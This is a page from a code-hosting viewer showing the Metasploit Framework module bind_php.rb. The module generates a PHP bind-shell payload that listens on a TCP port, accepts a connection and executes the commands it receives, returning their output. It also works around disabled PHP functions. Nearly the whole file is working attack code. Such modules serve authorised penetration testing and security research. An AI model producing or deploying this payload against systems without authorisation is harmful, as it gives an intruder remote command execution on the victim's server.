CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/php/bind_php.rb
Views: 11766
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
module MetasploitModule

8


9
  CachedSize = :dynamic

10


11
  include Msf::Payload::Single

12
  include Msf::Payload::Php

13
  include Msf::Sessions::CommandShellOptions

14


15
  def initialize(info = {})

16
    super(merge_info(info,

17
      'Name'          => 'PHP Command Shell, Bind TCP (via PHP)',

18
      'Description'   => 'Listen for a connection and spawn a command shell via php',

19
      'Author'        => ['egypt', 'diaul <diaul[at]devilopers.org>',],

20
      'License'       => BSD_LICENSE,

21
      'Platform'      => 'php',

22
      'Arch'          => ARCH_PHP,

23
      'Handler'       => Msf::Handler::BindTcp,

24
      'Session'       => Msf::Sessions::CommandShell,

25
      'PayloadType'   => 'cmd',

26
      'Payload'       =>

27
        {

28
          'Offsets' => { },

29
          'Payload' => ''

30
        }

31
      ))

32
  end

33


34
  #

35
  # PHP Bind Shell

36
  #

37
  def php_bind_shell

38


39
    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);

40
    shell = <<-END_OF_PHP_CODE

41
    #{php_preamble(disabled_varname: dis)}

42
    $port=#{datastore['LPORT']};

43


44
    $scl='socket_create_listen';

45
    if(is_callable($scl)&&!in_array($scl,#{dis})){

46
      $sock=@$scl($port);

47
    }else{

48
      $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);

49
      $ret=@socket_bind($sock,0,$port);

50
      $ret=@socket_listen($sock,5);

51
    }

52
    $msgsock=@socket_accept($sock);

53
    @socket_close($sock);

54


55
    while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))

56
    {

57
      $o = '';

58
      $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);

59
      if(FALSE===$c){break;}

60
      if(substr($c,0,3) == 'cd '){

61
        chdir(substr($c,3,-1));

62
      } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {

63
        break;

64
      }else{

65
        #{php_system_block({:cmd_varname=>"$c", :output_varname=>"$o", :disabled_varname => dis})}

66
      }

67
      @socket_write($msgsock,$o,strlen($o));

68
    }

69
    @socket_close($msgsock);

70
    END_OF_PHP_CODE

71


72
    return shell

73
  end

74


75
  #

76
  # Constructs the payload

77
  #

78
  def generate(_opts = {})

79
    return super + php_bind_shell

80
  end

81
end

82


83